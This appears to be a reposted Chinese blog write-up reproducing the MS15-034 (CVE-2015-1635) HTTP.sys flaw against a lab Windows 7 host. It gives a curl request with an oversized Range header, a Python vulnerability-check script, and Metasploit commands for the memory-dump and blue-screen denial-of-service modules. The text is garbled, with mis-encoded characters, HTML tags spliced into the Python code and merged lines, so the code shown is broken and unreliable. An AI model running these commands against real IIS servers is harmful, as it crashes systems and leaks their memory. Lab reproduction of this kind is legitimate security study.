【复现】CVE-2015-1635-HTTP.SYS远程执行代码漏洞(ms15-034)
1.1.1 ?漏洞描述
在2015年4月安全補(bǔ)丁日,微軟發(fā)布的眾多安全更新中,修復(fù)了HTTP.sys中一處允許遠(yuǎn)程執(zhí)行代碼漏洞,編號(hào)為:CVE-2015-1635(MS15-034 )。利用HTTP.sys的安全漏洞,攻擊者只需要發(fā)送惡意的http請(qǐng)求數(shù)據(jù)包,就可能遠(yuǎn)程讀取IIS服務(wù)器的內(nèi)存數(shù)據(jù),或使服務(wù)器系統(tǒng)藍(lán)屏崩潰。根據(jù)公告顯示,該漏洞對(duì)服務(wù)器系統(tǒng)造成了不小的影響,主要影響了包括Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2在內(nèi)的主流服務(wù)器操作系統(tǒng)。
1.1.2 ?漏洞測(cè)試
環(huán)境搭建:
靶機(jī): win7(192.168.80.130)
攻擊機(jī): kali(192.168.80.129)
(1)使用curl工具進(jìn)行測(cè)試,測(cè)試命令:
curl http://192.168.80.130 -H "Host: 192.168.80.130" -H "Range: bytes=0-18446744073709551615"
測(cè)試結(jié)果截圖:
?
(2)使用POC測(cè)試,代碼為:
import socketimport random
ipAddr = “192.168.80.130”
hexAllFfff = “18446744073709551615”
req1 = “GET / HTTP/1.0\r\n\r\n”
req = “GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-” + hexAllFfff + “\r\n\r\n”
print “[*] Audit Started”
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket.connect((ipAddr, 80))
client_socket.send(req1)
boringResp = client_socket.recv(1024)
if “Microsoft” not in boringResp:
</span><span style="color: #0000ff;">print</span> <span style="color: #800000;">"</span><span style="color: #800000;">[*] Not IIS</span><span style="color: #800000;">"</span><span style="color: #000000;">exit(0)client_socket.close()
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket.connect((ipAddr, 80))
client_socket.send(req)
goodResp = client_socket.recv(1024)
if “Requested Range Not Satisfiable” in goodResp:
</span><span style="color: #0000ff;">print</span> <span style="color: #800000;">"</span><span style="color: #800000;">[!!] Looks VULN</span><span style="color: #800000;">"</span>elif " The request has an invalid header name" in goodResp:
</span><span style="color: #0000ff;">print</span> <span style="color: #800000;">"</span><span style="color: #800000;">[*] Looks Patched</span><span style="color: #800000;">"</span>else:
print “[*] Unexpected response, cannot discern patch status”
測(cè)試結(jié)果截圖:
?
1.1.3 ?漏洞利用
(1)利用ms15-034漏洞讀取服務(wù)器內(nèi)存數(shù)據(jù)
借助metasploit平臺(tái),截圖如下:
use auxiliary/scanner/http/ms15_034_http_sys_memory_dump?
set rhosts 192.168.80.130
run
?
(2)利用ms15-034漏洞進(jìn)行ddos攻擊
同樣借助metasploit平臺(tái),截圖如下:
use?auxiliary/dos/http/ms15_034_ulonglongadd?
set rhosts 192.168.80.130
set threads 10
run
?
攻擊開(kāi)始后,win7瞬間藍(lán)屏然后自動(dòng)重啟,截圖如下:
?
1.1.4 ?漏洞修復(fù)
禁用IIS內(nèi)核緩存(可能降低IIS性能)
?
?
總結(jié)
以上是生活随笔為你收集整理的【复现】CVE-2015-1635-HTTP.SYS远程执行代码漏洞(ms15-034)的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。
- 上一篇: xss权限维持(小技巧)
- 下一篇: POC-EXP编写